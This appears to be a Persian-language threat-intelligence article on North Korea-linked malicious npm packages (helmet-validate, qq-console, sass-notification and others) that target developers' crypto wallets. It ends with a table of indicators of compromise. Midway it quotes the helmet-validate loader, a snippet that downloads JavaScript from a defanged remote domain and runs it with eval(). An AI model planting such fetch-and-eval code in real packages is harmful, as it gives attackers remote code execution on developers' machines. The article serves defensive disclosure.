ما در چند هفته گذشته، شاهد افزایش مجدد فعالیتهای گروههای همسو با اهداف کره شمالی بودهایم که چندین پکیج را در رجیستری npm منتشر کردند. این اقدام آنها نشان دهنده تلاشهای هماهنگ و بی وقفه برای نفوذ به توسعه دهندگان توسط بدافزار و سرقت داراییهای ارزهای دیجیتال قربانیان است.
آخرین موج حملات که بین 12 تا 27 آگوست 2024 مشاهده شد، شامل پکیجهایی به نامهای temp-etherscan-api، ethersscan-api، telegram-con، helmet-validate و qq-console میشود.
به نظر میرسد این پکیجها حاوی بدافزار مشابهی از جمله qq-console هستند که دو هفته بعد در 27 آگوست منتشر شد.
شرکت امنیت زنجیره تامین نرم افزار Phylum در این خصوص اظهار داشت که رفتارهای این حملات ما را به این باور رسانده است که کنسول qq مربوط به کمپین کره شمالی معروف به “مصاحبه مُسری یا Contagious Interview” میباشد.
مصاحبه مُسری به یک کمپین در حال انجام اشاره دارد که به دنبال نفوذ به توسعهدهندگان نرم افزار توسط بدافزار رباینده اطلاعات است.
این بدافزار رباینده طی یک مصاحبه شغلی و توسط پکیجهای npm جعلی و آلوده به بدافزار و نصبکنندههای جعلی مانند MiroTalk به قربانیان تحویل داده میشود.
هدف نهایی این حملات، استقرار یک پیلود پایتون به نام InvisibleFerret است که میتواند دادههای حساس را از افزونههای مرورگر کیف پول ارز دیجیتال استخراج کند و با استفاده از نرم افزار دسکتاپ از راه دور قانونی مانند AnyDesk، تداوم دسترسی خود را بر روی سیستم قربانی تضمین کند. CrowdStrike، این فعالیت را تحت نام Famous Chollima دنبال میکند.
پکیج helmet-validate که به تازگی مشاهده شده است، رویکرد جدیدی را اتخاذ کرده است؛ به این صورت که قطعهای از فایل کد جاوا اسکریپت به نام config.js را در خود دارد که مستقیماً جاوا اسکریپت میزبانی شده در یک دامنه راه دور (ipcheck[.]cloud) را با استفاده از تابع eval() اجرا میکند.
const axios = require("axios")
async function runCode() {
const res = await axios.get("<http://ipcheck>[.]cloud/api/user/thirdcookie/v3/197");
eval(res.data.cookie);
}
runCode();
ipcheck[.]cloud به همان آدرسIP (167[.]88[.]36[.]13) که mirotalk[.]net در زمان آنلاین بودن آن را resolve میکند، اشاره دارد و پیوندهای بالقوه بین این دو مجموعه حمله را برجسته میکند.
پکیج دیگری به نام sass-notification نیز مشاهده گشته که در 27 آگوست 2024 آپلود شده است. این پکیج دارای شباهتهایی با کتابخانههای npm کشف شده قبلی مانند call-blockflow دارد. این پکیجها به یک گروه هک تهدید کننده کره شمالی به نام Moonstone Sleet نسبت داده شدهاند.
این حملات با استفاده از جاوا اسکریپت مبهم برای نوشتن و اجرای اسکریپتهای batch و پاورشل طراحی میشوند. اسکریپتها یک پیلود از راه دور را دانلود و رمزگشایی میکنند، آن را بهعنوان یک DLL اجرا و سپس تلاش میکنند تا تمام آثار فعالیتهای مخرب را پاک نمایند و یک پکیج به ظاهر درست را بر روی دستگاه قربانی دانلود کنند.
IOC
نام پکیج | نسخه | Sha256 |
ethersscan-api | 0.0.1 | d4f3113e1e0384bcf37c39678deb196fb5b39f15c4990134b6b8637be74e5a2e |
ethersscan-api | 0.0.2 | f1f3002dec6e36e692e087626edd9b6b0f95a176c0c204d4703ccb4f425aa317 |
ethersscan-api | 0.0.3 | 5e5313aaf281c8a8eed29ba2c1aaa5aa65bc174bcd0be466f4533712599db758 |
helmet-validate | 0.0.1 | 2a00838ccd08b26c7948d1dd25c33a114dd81c3bcee3de595783e6f396e7f50e |
qq-console | 0.0.1 | aec21b53ee4ae0b55f5018fc5aaa5a4f095a239a64272ca42047c40ec3c212c0 |
sass-notification | 1.0.0 | f7c142178605102ee56f7e486ba68b97f3f6b522994b24f4116dbbd2abc28cec |
telegram-con | 0.0.1 | 0110318f70072171c0edc624c8e8be38892f984b121d6a5a5ced1f6b0b45dbd0 |
temp-etherscan-api | 0.0.1 | 94da263d603bf735ab85f829b564261e59a1d13915d21babe58e72435bfe32ab |
